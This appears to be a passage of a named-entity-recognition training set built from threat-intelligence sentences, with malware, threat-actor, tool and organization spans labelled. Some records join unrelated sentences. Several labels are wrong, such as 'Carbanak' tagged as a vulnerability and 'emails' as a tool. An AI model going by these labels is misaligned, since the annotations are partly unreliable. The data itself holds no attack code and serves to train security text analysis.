However , the WATERSPOUT campaign shared several traits with the RIPTIDE and HIGHTIDE campaign that we have attributed to APT12 . Emotet has used HTTP over ports such as 20 , 22 , 7080 , and 50000 , in addition to using ports commonly associated with HTTP / S.[13 ] FIN7 has used port - protocol mismatches on ports such as 53 , 80 , 443 , and 8080 during C2.[14 ]", "spans": {"MALWARE: WATERSPOUT": [[209, 219]], "MALWARE: RIPTIDE": [[260, 267]], "MALWARE: HIGHTIDE": [[272, 280]], "THREAT_ACTOR: APT12": [[317, 322]], "THREAT_ACTOR: FIN7": [[461, 465]]}, "info": {"id": "cyberner_stix_train_004608", "source": "cyberner_stix_train"}} {"text": "EXECUTIVE SUMMARY Cisco Talos has discovered a new Android malware based on a leak of the DenDroid malware family . Finally , this geo-location supports the likely theory that the attackers behind Kimsuky are based in North Korea . The IXESHE campaign makes use of targeted emails with malicious attachments to compromise victims ’ systems . A more granular future direction for strengthening CSP direction to consider as part of the CSP standard is XHR proxy enforcement .", "spans": {"ORGANIZATION: Cisco Talos": [[18, 29]], "MALWARE: DenDroid": [[90, 98]], "THREAT_ACTOR: Kimsuky": [[197, 204]], "THREAT_ACTOR: IXESHE": [[236, 242]], "TOOL: emails": [[274, 280]]}, "info": {"id": "cyberner_stix_train_004609", "source": "cyberner_stix_train"}} {"text": "That communication is an Achilles heel for any botnet – it may raise suspicion and , cutting the bots off is always lethal to the botnet ’ s functioning . This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills . 
Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers .", "spans": {"THREAT_ACTOR: Scattered Canary": [[230, 246]], "ORGANIZATION: Symantec": [[291, 299]], "THREAT_ACTOR: Lazarus": [[326, 333]], "ORGANIZATION: customers": [[371, 380]]}, "info": {"id": "cyberner_stix_train_004610", "source": "cyberner_stix_train"}} {"text": "These services appear to be running on all network interfaces and are therefore accessible to anyone sharing a local network with an infected device . The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry . Describes a resolution by the Asian Parliamentary Assembly ( APA ) held in Anatalya , announcing unlimited support for the Palestinian people 7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c . jalsa.rar : The attackers behind Earth Vetala use features of remote access software to steal sensitive information or download malware for additional cyber operations , leveraging spearphishing emails and lure documents containing embedded links to a legitimate filesharing service Onehub to distribute archives containing the ScreenConnect remote administrator tool and RemoteUtilities software .", "spans": {"ORGANIZATION: companies": [[211, 220]], "ORGANIZATION: video game and software development industry": [[240, 284]], "ORGANIZATION: Asian Parliamentary Assembly": [[317, 345]], "ORGANIZATION: APA": [[348, 351]], "FILEPATH: 7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c": [[429, 493]], "FILEPATH: jalsa.rar": [[496, 505]], "TOOL: Onehub": [[779, 785]], "TOOL: ScreenConnect remote administrator tool": [[824, 863]], "TOOL: RemoteUtilities software": [[868, 892]]}, "info": {"id": "cyberner_stix_train_004611", "source": "cyberner_stix_train"}} {"text": "We believe that this method is engineered to avoid trivial detection of process injection using the well-detected CreateRemoteThread or ZwQueueApcThread API . 
The Rocket Kitten attacker group 's main attack vector is spear-phishing . The shellcode is obfuscated using OceanLotus ’s standard approach of flattening the control flow and inserting junk opcodes ( as described in the ESET white paper on OceanLotus ) . For example , analysts need to consider during analysis whether the appliance is recording the true client IP addresses ( opposed to network address translation [ NAT ] addresses ) , and what normal user behavior looks like ( do users shift IP addresses frequently ) .", "spans": {"THREAT_ACTOR: Rocket Kitten": [[163, 176]], "THREAT_ACTOR: attacker group": [[177, 191]], "THREAT_ACTOR: OceanLotus": [[268, 278], [400, 410]], "ORGANIZATION: ESET": [[380, 384]]}, "info": {"id": "cyberner_stix_train_004612", "source": "cyberner_stix_train"}} {"text": "Notably , all of the content text is accessible to the victim even before macros are enabled .", "spans": {"TOOL: macros": [[74, 80]]}, "info": {"id": "cyberner_stix_train_004613", "source": "cyberner_stix_train"}} {"text": "Sofacy ’s August 2015 attack wave .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]]}, "info": {"id": "cyberner_stix_train_004614", "source": "cyberner_stix_train"}} {"text": "App Icon Figure 1 : App icon and fake notification . The ShooterAudio module uses PulseAudio to capture audio from the user's microphone . 
Winnti ver.1 , these values were designated as ‘ tag ’ and ‘ group ’ .", "spans": {"MALWARE: ShooterAudio module": [[57, 76]], "TOOL: PulseAudio": [[82, 92]], "MALWARE: Winnti": [[139, 145]]}, "info": {"id": "cyberner_stix_train_004615", "source": "cyberner_stix_train"}} {"text": "Both publications happened before the second wave took place and received notable publicity .", "spans": {}, "info": {"id": "cyberner_stix_train_004616", "source": "cyberner_stix_train"}} {"text": "The Android permissions requested by HenBox , as defined in the apps ’ AndroidManifest.xml files , range from accessing location and network settings to messages , call , and contact data . Beginning in July 2018 , APT41 appeared to have directly targeted several East and Southeast Asia-based video game developers and distributors to inject legitimate executables with the CRACKSHOT backdoor . Compared to other backdoor tools associated with the Sofacy group , the use of Zebrocy in attack campaigns is far more widespread .", "spans": {"SYSTEM: Android": [[4, 11]], "MALWARE: HenBox": [[37, 43]], "THREAT_ACTOR: APT41": [[215, 220]], "ORGANIZATION: video game developers": [[294, 315]], "MALWARE: backdoor tools": [[414, 428]], "THREAT_ACTOR: Sofacy group": [[449, 461]], "MALWARE: Zebrocy": [[475, 482]]}, "info": {"id": "cyberner_stix_train_004617", "source": "cyberner_stix_train"}} {"text": "What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants’ rights in Qatar and Nepal . 
Similar to the Bisonal variant targeting the Russian organization , this sample was also disguised as PDF document .", "spans": {"FILEPATH: Bisonal": [[335, 342]], "TOOL: PDF": [[422, 425]]}, "info": {"id": "cyberner_stix_train_004618", "source": "cyberner_stix_train"}} {"text": "These differences include a new hashing algorithm to resolve API functions and to find running browser processes for injection , as well as changes to the C2 communication mechanisms .", "spans": {"TOOL: API": [[61, 64]], "TOOL: C2": [[155, 157]]}, "info": {"id": "cyberner_stix_train_004619", "source": "cyberner_stix_train"}} {"text": "Immediately when the File Manager window is opened by the attacker , the Quasar serve sends two commands to the RAT : GetDrives and listDirectory ( to populate the list of the victim ’s files in the RAT Server GUI ) .", "spans": {"TOOL: the File Manager window": [[17, 40]], "MALWARE: Quasar": [[73, 79]], "TOOL: RAT": [[112, 115]], "TOOL: RAT Server GUI": [[199, 213]]}, "info": {"id": "cyberner_stix_train_004620", "source": "cyberner_stix_train"}} {"text": "The PinchDuke toolset consists of multiple loaders and a core information stealer Trojan .", "spans": {"MALWARE: PinchDuke": [[4, 13]], "TOOL: loaders": [[43, 50]], "TOOL: information stealer": [[62, 81]], "MALWARE: Trojan": [[82, 88]]}, "info": {"id": "cyberner_stix_train_004622", "source": "cyberner_stix_train"}} {"text": "Malicious APK Like its previous versions , XLoader 6.0 abuses social media user profiles to hide its real C & C addresses , but this time its threat actors chose the social media platform Twitter , which was never used in previous attacks . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . This function takes several parameters, most of which are represented in the subdomain label(s) of the query . 
In addition , Hack520 ’s tweets always show photos of the same animal , which is likely his pet pig .", "spans": {"MALWARE: XLoader 6.0": [[43, 54]], "ORGANIZATION: Twitter": [[188, 195]], "THREAT_ACTOR: APT12": [[272, 277]], "TOOL: HIGHTIDE": [[306, 314]], "TOOL: Microsoft Word": [[323, 337]], "TOOL: .doc": [[340, 344]], "VULNERABILITY: CVE-2012-0158": [[370, 383]]}, "info": {"id": "cyberner_stix_train_004623", "source": "cyberner_stix_train"}} {"text": "Because the domain had been sinkholed , this activity could not be completed .", "spans": {}, "info": {"id": "cyberner_stix_train_004624", "source": "cyberner_stix_train"}} {"text": "We can not say for sure if Wolf Research and Coralco Tech are linked , but this panel name , their offerings and the panel layout would suggest it should be considered suspiciously linked . which they launched targeted attacks against Russian banks , businesses and media companies . It makes use of a custom Base64 alphabet . A browser redirects to this page but search engines do n't update their links to the resource ( in ' SEO - speak ' , it is said that the ' link - juice ' is not sent to the new URL ) .", "spans": {"ORGANIZATION: Wolf Research": [[27, 40]], "ORGANIZATION: Coralco Tech": [[45, 57]], "ORGANIZATION: banks": [[243, 248]], "ORGANIZATION: businesses": [[251, 261]], "ORGANIZATION: media companies": [[266, 281]], "TOOL: browser": [[329, 336]]}, "info": {"id": "cyberner_stix_train_004625", "source": "cyberner_stix_train"}} {"text": "TABLE OF CONTENTS Key Findings Introduction Threat Analysis Fakespy Code Analysis Dynamic Library Loading Stealing Sensitive Information Anti-Emulator Techniques Under Active Development Who is Behind Fakespy 's Smishing Campaigns ? \bCTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . 
Without Symantec 's advanced AI-based capabilities , Gallmaker 's activities may well have remained undetected .", "spans": {"MALWARE: Fakespy": [[60, 67], [201, 208]], "ORGANIZATION: \bCTU": [[233, 237]], "THREAT_ACTOR: COBALT GYPSY": [[264, 276]], "ORGANIZATION: Symantec": [[388, 396]], "THREAT_ACTOR: Gallmaker": [[433, 442]]}, "info": {"id": "cyberner_stix_train_004626", "source": "cyberner_stix_train"}} {"text": "Talos reported that these DNS hijacks also paved the way for the attackers to obtain SSL encryption certificates for the targeted domains ( e.g.webmail.finance.gov.lb ) , which allowed them to decrypt the intercepted email and VPN credentials and view them in plain text . TG-3390 is capable of using a C2 infrastructure that spans multiple networks and registrars .", "spans": {"ORGANIZATION: Talos": [[0, 5]], "THREAT_ACTOR: TG-3390": [[273, 280]]}, "info": {"id": "cyberner_stix_train_004627", "source": "cyberner_stix_train"}} {"text": "These hooks are created using the root access and a custom native code called Lmt_INJECT , although the algorithm for this is well known . Nitro 's campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . The use of BLACKCOFFEE demonstrates threat actors ’ evolving use of public websites to hide in plain sight . 
Once the system is exploited , a very small downloader is dropped onto the victim - s disc that - s only 20 KB in size .", "spans": {"THREAT_ACTOR: Nitro": [[139, 144]], "ORGANIZATION: chemical sector": [[172, 187]], "MALWARE: BLACKCOFFEE": [[317, 328]]}, "info": {"id": "cyberner_stix_train_004628", "source": "cyberner_stix_train"}} {"text": "Additionally , since it does not execute any other functionality autonomously , it would no longer be a direct threat .", "spans": {}, "info": {"id": "cyberner_stix_train_004629", "source": "cyberner_stix_train"}} {"text": "In the future , it will be invoked by malicious SDK during banner ads display . Corkow provided remote access to the ITS-Broker system terminal by 《 Platforma soft 》 Ltd , which enabled the fraud to be committed . The group has been active since 2015 , but increased its attacks in 2019 . These are also highly targeted emails with ( relatively speaking ) convincing lures , so whoever is behind these is not to be ignored .", "spans": {"TOOL: Corkow": [[80, 86]], "ORGANIZATION: emails": [[320, 326]]}, "info": {"id": "cyberner_stix_train_004630", "source": "cyberner_stix_train"}} {"text": "To assess attribution , CTU researchers analyze observed activity , third-party reporting , and contextual intelligence .", "spans": {"ORGANIZATION: CTU": [[24, 27]]}, "info": {"id": "cyberner_stix_train_004631", "source": "cyberner_stix_train"}} {"text": "From an external analysts ’ point of view , the wonder is , which is superior to the other? And my answer for this is : neither is perfect , but both are useful – depending upon your goals and objectives .", "spans": {}, "info": {"id": "cyberner_stix_train_004632", "source": "cyberner_stix_train"}} {"text": "Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . 
MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) .", "spans": {"MALWARE: Ploutus": [[55, 62]], "FILEPATH: MXI Player": [[220, 230]], "DOMAIN: com.mxi.videoplay": [[360, 377]]}, "info": {"id": "cyberner_stix_train_004633", "source": "cyberner_stix_train"}} {"text": "Shellcode is passed to the exploit from HTML in flashvars .", "spans": {"TOOL: Shellcode": [[0, 9]], "TOOL: HTML": [[40, 44]]}, "info": {"id": "cyberner_stix_train_004634", "source": "cyberner_stix_train"}} {"text": "However , many organizations fail to use these basic security measures , leaving their systems open to compromise :", "spans": {}, "info": {"id": "cyberner_stix_train_004635", "source": "cyberner_stix_train"}} {"text": "The threat group's systemic long-term targeting of NGO and political networks does not align with patriotic or criminal threat groups .", "spans": {"ORGANIZATION: NGO": [[51, 54]]}, "info": {"id": "cyberner_stix_train_004636", "source": "cyberner_stix_train"}} {"text": "] net , which was also used as a Poison Ivy C2 in the Arbor Networks blog . This shift , however , has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons . 
Based on incident response investigations , product detections , and intelligence observations along with additional publications on the same operators , FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests .", "spans": {"MALWARE: Poison Ivy": [[33, 43]], "ORGANIZATION: Arbor Networks": [[54, 68]], "THREAT_ACTOR: group's": [[120, 127]], "ORGANIZATION: video game industry": [[165, 184]], "THREAT_ACTOR: operators": [[363, 372]], "ORGANIZATION: FireEye": [[375, 382]], "THREAT_ACTOR: APT32": [[397, 402]]}, "info": {"id": "cyberner_stix_train_004637", "source": "cyberner_stix_train"}} {"text": "Politically-motivated APT : Cybereason suspects that the objective of the threat actor is to obtain sensitive information from the victims and leverage it for political purposes .", "spans": {"ORGANIZATION: Cybereason": [[28, 38]]}, "info": {"id": "cyberner_stix_train_004638", "source": "cyberner_stix_train"}} {"text": "Droppers Per Device Avg . During the months that followed in which we tracked Confucius' activities , we found that they were still aiming for Pakistani targets . However , the MSI packages hosted at each URL are frequently changed or updated . We observed that in at least two cases , the threat actors subsequently issued the following command against the Exchange web server : This command attempts to delete the administrator user from the Exchange Organizations administrators group , beginning with the Domain Controller in the current domain .", "spans": {"TOOL: MSI": [[177, 180]], "SYSTEM: Exchange web server": [[358, 377]]}, "info": {"id": "cyberner_stix_train_004639", "source": "cyberner_stix_train"}} {"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . 
If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit .", "spans": {"THREAT_ACTOR: attackers": [[14, 23]], "MALWARE: MS PowerPoint document": [[32, 54]], "VULNERABILITY: CVE-2014-6352": [[80, 93]], "MALWARE: DoublePulsar backdoor": [[103, 124]], "MALWARE: SMB worm": [[151, 159]], "VULNERABILITY: Eternalblue": [[204, 215]], "TOOL: SMBv1": [[216, 221]], "VULNERABILITY: exploit": [[222, 229]]}, "info": {"id": "cyberner_stix_train_004640", "source": "cyberner_stix_train"}} {"text": "One outlier SPLM target profile within our visibility includes an audit and consulting firm in Bosnia and Herzegovina .", "spans": {"MALWARE: SPLM": [[12, 16]]}, "info": {"id": "cyberner_stix_train_004641", "source": "cyberner_stix_train"}} {"text": "Attackers know that rooting devices via malware exploits is an effective means to control devices and gather information from them . TinyZBot is a bot written in C# and developed by the Cleaver team . used in the microcode . While we can not validate these claims , there are indications that some of these documents are legitimate , which would demonstrate another significant increase in capability for the group .", "spans": {"TOOL: TinyZBot": [[133, 141]], "THREAT_ACTOR: Cleaver": [[186, 193]]}, "info": {"id": "cyberner_stix_train_004642", "source": "cyberner_stix_train"}} {"text": "The remainder of this section describes at a high-level what HenBox is capable of , and how it operates . Since 2013 , APT41 has targeted organizations involved in the research , development , and sale of computer components used for machine-learning , autonomous vehicles , medical imaging , and the consumer market . The targets were similar to a 2015 TG-4127 campaign — individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. 
and Europe , individuals working in the defense and government supply chain , and authors and journalists — but also included email accounts linked to the November 2016 United States presidential election .", "spans": {"THREAT_ACTOR: APT41": [[119, 124]], "ORGANIZATION: organizations": [[138, 151]], "ORGANIZATION: machine-learning": [[234, 250]], "ORGANIZATION: autonomous vehicles": [[253, 272]], "ORGANIZATION: medical imaging": [[275, 290]], "ORGANIZATION: consumer market": [[301, 316]], "ORGANIZATION: military": [[445, 453]], "ORGANIZATION: government personnel": [[458, 478]], "ORGANIZATION: defense": [[531, 538]], "ORGANIZATION: government": [[543, 553]], "ORGANIZATION: authors": [[573, 580]], "ORGANIZATION: journalists": [[585, 596]]}, "info": {"id": "cyberner_stix_train_004643", "source": "cyberner_stix_train"}} {"text": "When executed the second time by clicking on the app on the physical device , FakeSpy redirects to the app settings . This activity cluster , which Kaspersky Lab has followed for a few years , uses various implants for targeting mainly banks , and developers of banking and money processing software solutions . 
The MyWeb sample that FireEye analyzed has a compile date of 1/20/2011 .", "spans": {"MALWARE: FakeSpy": [[78, 85]], "THREAT_ACTOR: activity cluster": [[123, 139]], "ORGANIZATION: Kaspersky": [[148, 157]], "ORGANIZATION: banks": [[236, 241]], "ORGANIZATION: money processing": [[274, 290]], "MALWARE: MyWeb sample": [[316, 328]], "ORGANIZATION: FireEye": [[334, 341]]}, "info": {"id": "cyberner_stix_train_004644", "source": "cyberner_stix_train"}} {"text": "The author of Dumpert describes the tool as an LSASS dumping tool that uses direct system calls and API unhooking to evade antivirus and EDR solutions .", "spans": {"TOOL: Dumpert": [[14, 21]], "TOOL: LSASS": [[47, 52]], "TOOL: EDR": [[137, 140]]}, "info": {"id": "cyberner_stix_train_004645", "source": "cyberner_stix_train"}} {"text": "This means that , unless victims lock their devices via the hardware button , the timer provides plenty of time for the malware to remotely perform malicious , in-app operations . The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation . This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans .", "spans": {"ORGANIZATION: ZLAB": [[256, 260]], "THREAT_ACTOR: TA505": [[370, 375]], "TOOL: Bitcoin": [[451, 458]]}, "info": {"id": "cyberner_stix_train_004646", "source": "cyberner_stix_train"}} {"text": "Note : DLL side loading is a prevalent persistence technique that is used to launch a multitude of backdoors .", "spans": {"TOOL: DLL": [[7, 10]], "TOOL: backdoors": [[99, 108]]}, "info": {"id": "cyberner_stix_train_004647", "source": "cyberner_stix_train"}} {"text": "The Russian government views the U.S. 
as a strategic rival and is known to task its intelligence agencies with gathering confidential information about individuals and organizations close to the center of power in the U.S. Individuals working for the Hillary for America campaign could have information about proposed policies for a Clinton presidency , including foreign-policy positions , which would be valuable to the Russian government .", "spans": {}, "info": {"id": "cyberner_stix_train_004648", "source": "cyberner_stix_train"}} {"text": "com.xapo com.airbitz com.kibou.bitcoin com.qcan.mobile.bitcoin.wallet me.cryptopay.android com.bitcoin.wallet lt.spectrofinance.spectrocoin.android.wallet com.kryptokit.jaxx com.wirex bcn.org.freewallet.app com.hashengineering.bitcoincash.wallet bcc.org.freewallet.app com.coinspace.app btg.org.freewallet.app net.bither In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe . Threat : Gamaredon Pteranodon weaponized document . 
The threat actor cleared Windows Event Logs on affected backend Exchange servers so further information was not available regarding the PowerShell commands leveraged by the threat actors .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[346, 356]], "THREAT_ACTOR: NEODYMIUM": [[361, 370]], "ORGANIZATION: specific individuals": [[415, 435]], "THREAT_ACTOR: Gamaredon": [[457, 466]], "MALWARE: Pteranodon": [[467, 477]], "THREAT_ACTOR: threat actor": [[504, 516]], "THREAT_ACTOR: threat actors": [[673, 686]]}, "info": {"id": "cyberner_stix_train_004649", "source": "cyberner_stix_train"}} {"text": "It is worth noting that this server also seems to be operated by CrookServers , since among other domains , 454-reverse.crookservers.net resolved to the same IP address .", "spans": {"ORGANIZATION: CrookServers": [[65, 77]], "DOMAIN: 454-reverse.crookservers.net": [[108, 136]]}, "info": {"id": "cyberner_stix_train_004650", "source": "cyberner_stix_train"}} {"text": "The threat actors may be able to keep this session alive and maintain persistent access .", "spans": {}, "info": {"id": "cyberner_stix_train_004651", "source": "cyberner_stix_train"}} {"text": "Since the class does not exist at startup , the application does not run on the debugger . Moafee and DragonOK both use a well-known proxy tool – HUC Packet Transmit Tool ( HTRAN ) – to disguise their geographical locations . Download an archive with the tool ( .exe ) . 
8.15 Logging & 8.16 Monitoring activities – determining the system information to log , store and query allows malicious behavior to be uncovered , if threat intelligence is applied to understand how threats may manifest themselves within log data .", "spans": {"THREAT_ACTOR: Moafee": [[91, 97]], "THREAT_ACTOR: DragonOK": [[102, 110]], "TOOL: HUC Packet Transmit Tool": [[146, 170]], "TOOL: HTRAN": [[173, 178]], "FILEPATH: .exe": [[262, 266]], "VULNERABILITY: log data": [[510, 518]]}, "info": {"id": "cyberner_stix_train_004652", "source": "cyberner_stix_train"}} {"text": "In mid-August 2018 , a modified version of Hermes , dubbed Ryuk , started appearing in a public malware repository . These rules detect the malware \" beaconing \" to the command-and-control server , the initial malware check-in , and an attempt to download a backdoor module .", "spans": {"TOOL: Hermes": [[43, 49]], "TOOL: Ryuk": [[59, 63]], "MALWARE: beaconing": [[150, 159]], "MALWARE: command-and-control server": [[169, 195]]}, "info": {"id": "cyberner_stix_train_004653", "source": "cyberner_stix_train"}} {"text": "The malware has been dubbed ‘ SimBad ’ due to the fact that a large portion of the infected applications are simulator games . Targeting data supports the belief that APT39 's key mission is to track or monitor targets of interest , collect personal information , including travel itineraries , and gather customer data from telecommunications firms . 
In 2015 , Suckfly conducted a multistage attack .", "spans": {"MALWARE: SimBad": [[30, 36]], "THREAT_ACTOR: APT39": [[167, 172]], "ORGANIZATION: telecommunications firms": [[325, 349]]}, "info": {"id": "cyberner_stix_train_004654", "source": "cyberner_stix_train"}} {"text": "It first attracted our attention in April of this year when we observed an actor customizing the malware for use in highly targeted campaigns .", "spans": {}, "info": {"id": "cyberner_stix_train_004655", "source": "cyberner_stix_train"}} {"text": "AutoFocus customers can track these tools with the Sofacy , SofacyMacro and SofacyCarberp .", "spans": {"ORGANIZATION: AutoFocus": [[0, 9]], "THREAT_ACTOR: Sofacy": [[51, 57]], "MALWARE: SofacyMacro": [[60, 71]], "MALWARE: SofacyCarberp": [[76, 89]]}, "info": {"id": "cyberner_stix_train_004656", "source": "cyberner_stix_train"}} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . The decoy slideshows all contain photos from very meaningful events to individuals in Thailand , suggesting that the actors continually look for impactful events to use to disguise their attacks .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "MALWARE: decoy slideshows": [[203, 219]]}, "info": {"id": "cyberner_stix_train_004657", "source": "cyberner_stix_train"}} {"text": "One of the obfuscation tricks included by the malware authors in a VM opcode dispatcher Even armed with the knowledge we have described so far , it still took us many hours to write a full-fledged opcode interpreter that ’ s able to reconstruct the real code executed by FinFisher . 
The MPK bot is not publicly available and had previously been attributed to an adversary group called \" Rocket Kitten \" which has often been thought to be a state sponsored adversary operating in the Middle East region . Winnti : Dropper delivered by api.goallbandungtravel.com . Sandworm potentially developed the disruptive capability as early as three weeks prior to the OT event , suggesting the attacker may have been waiting for a specific moment to deploy the capability .", "spans": {"MALWARE: FinFisher": [[271, 280]], "TOOL: MPK bot": [[287, 294]], "THREAT_ACTOR: group": [[372, 377]], "THREAT_ACTOR: Rocket Kitten": [[387, 400]], "THREAT_ACTOR: Winnti": [[504, 510]], "DOMAIN: api.goallbandungtravel.com": [[534, 560]], "THREAT_ACTOR: Sandworm": [[563, 571]], "SYSTEM: OT": [[657, 659]]}, "info": {"id": "cyberner_stix_train_004658", "source": "cyberner_stix_train"}} {"text": "The main payload is usually Imminent Monitor RAT ; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT . Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure .", "spans": {"MALWARE: Monitor RAT": [[37, 48]], "MALWARE: LuminosityLink RAT": [[116, 134]], "MALWARE: NetWire RAT": [[137, 148]], "MALWARE: NjRAT": [[155, 160]], "FILEPATH: malicious file": [[219, 233]]}, "info": {"id": "cyberner_stix_train_004659", "source": "cyberner_stix_train"}} {"text": "What makes this function more suspicious is the two strings written in Chinese characters : ===状态=== ( ===Status=== ) - Checks whether the device is connected to a network ===类型=== ( ===Type=== ) - Checks whether the device sees available nearby Wifi networks isNetworkAvailable function used for monitoring network connectivity status . The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year . 
All of the CnC communications are performed over the HTTP protocol .", "spans": {"THREAT_ACTOR: FIN7": [[342, 346]], "MALWARE: HTTP protocol": [[485, 498]]}, "info": {"id": "cyberner_stix_train_004660", "source": "cyberner_stix_train"}} {"text": "After the installation , an application named “ Conference ” appears on the desktop : If the victim launches this app , he will see text which “ enlightens ” the information about the upcoming event : The full text reads follows . NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence . Operator X also took advantage of cultural idiosyncrasies in its target countries , for example , the regular and widely accepted use of personal Gmail accounts for work .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[231, 240]], "VULNERABILITY: CVE-2016-4117": [[266, 279]], "THREAT_ACTOR: PROMETHIUM": [[298, 308]]}, "info": {"id": "cyberner_stix_train_004661", "source": "cyberner_stix_train"}} {"text": "The newsnstat.com domain was used earlier in 2015 for previous HANGOVER campaigns , and was then repurposed in December 2015 for the MONSOON campaign . In late September 2015 Mofang used the website of Myanmar 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar .", "spans": {"THREAT_ACTOR: Mofang": [[175, 181]]}, "info": {"id": "cyberner_stix_train_004662", "source": "cyberner_stix_train"}} {"text": "Both WERDLOD and OSX_DOK.C are designed to kill the browser process before installing fake certificates .", "spans": {"MALWARE: WERDLOD": [[5, 12]], "MALWARE: OSX_DOK.C": [[17, 26]]}, "info": {"id": "cyberner_stix_train_004663", "source": "cyberner_stix_train"}} {"text": "] 230 [ . The Dukes are known to employ a vast arsenal of malware toolsets , which we identify as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , CloudDuke , SeaDuke , HammerDuke , PinchDuke , and GeminiDuke . 
Additional Analysis of the downloaded string is provided in the Gandcrab cradle section below . The “ -do ” flag specifies a SCIL program file to execute ( Figure 8) .", "spans": {"THREAT_ACTOR: Dukes": [[14, 19]], "TOOL: MiniDuke": [[98, 106]], "TOOL: CosmicDuke": [[109, 119]], "TOOL: OnionDuke": [[122, 131]], "TOOL: CozyDuke": [[134, 142]], "TOOL: CloudDuke": [[145, 154]], "TOOL: SeaDuke": [[157, 164]], "TOOL: HammerDuke": [[167, 177]], "TOOL: PinchDuke": [[180, 189]], "TOOL: GeminiDuke": [[196, 206]], "MALWARE: Gandcrab": [[273, 281]]}, "info": {"id": "cyberner_stix_train_004664", "source": "cyberner_stix_train"}} {"text": "The plugins are stored in its resource section and can be protected by the same VM . menuPass typically makes use of a mix of DDNS and actor-registered domains in their attack campaigns . Resource P1/1 contains config values , including port number and a registry path . This includes hosting C&C domains that were used by Winnti such as mtrue.com , shenqi[.]kr and zhu[.]kr .", "spans": {"TOOL: DDNS and actor-registered domains": [[126, 159]], "SYSTEM: C&C domains": [[293, 304]], "THREAT_ACTOR: Winnti": [[323, 329]]}, "info": {"id": "cyberner_stix_train_004665", "source": "cyberner_stix_train"}} {"text": "Our sample communicates with app.progsupdate.com , which resolved to 185.141.25.68 , over TCP port 4664 .", "spans": {"DOMAIN: app.progsupdate.com": [[29, 48]], "IP_ADDRESS: 185.141.25.68": [[69, 82]]}, "info": {"id": "cyberner_stix_train_004666", "source": "cyberner_stix_train"}} {"text": "Certificate information The Android package is named \" verReznov.Coampany . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . 
In 2017 , APT37 expanded its targeting beyond the Korean peninsula to include Japan , Vietnam and the Middle East , and to a wider range of industry verticals , including chemicals , electronics , manufacturing , aerospace , automotive and healthcare entities .", "spans": {"SYSTEM: Android": [[28, 35]], "MALWARE: tool": [[80, 84]], "THREAT_ACTOR: APT37": [[221, 226]], "ORGANIZATION: chemicals": [[382, 391]], "ORGANIZATION: electronics": [[394, 405]], "ORGANIZATION: manufacturing": [[408, 421]], "ORGANIZATION: aerospace": [[424, 433]], "ORGANIZATION: automotive": [[436, 446]], "ORGANIZATION: healthcare entities": [[451, 470]]}, "info": {"id": "cyberner_stix_train_004667", "source": "cyberner_stix_train"}} {"text": "] 172 cdncool [ . In some instances , APT41 leveraged POISONPLUG as a first-stage backdoor to deploy the HIGHNOON backdoor in the targeted environment . The Dukes could have ceased all use of CosmicDuke ( at least until they had developed a new loader ) or retired it entirely , since they still had other toolsets available .", "spans": {"THREAT_ACTOR: APT41": [[38, 43]], "TOOL: POISONPLUG": [[54, 64]], "TOOL: HIGHNOON": [[105, 113]], "THREAT_ACTOR: Dukes": [[157, 162]], "MALWARE: CosmicDuke": [[192, 202]]}, "info": {"id": "cyberner_stix_train_004668", "source": "cyberner_stix_train"}} {"text": "Containment provided by enclaving also makes incident cleanup significantly less costly .", "spans": {}, "info": {"id": "cyberner_stix_train_004669", "source": "cyberner_stix_train"}} {"text": "It has the added benefit of installing a nearly unlimited number of fraudulent apps without overloading the infected device . The naming scheme used by Novetta for the malware identified during Operation Blockbuster consists of at least two identifiers which each identifier coming from the International Civil Aviation Organization ( ICAO ) 's phonetic alphabet ,2 commonly referred to as the NATO phonetic alphabet . 
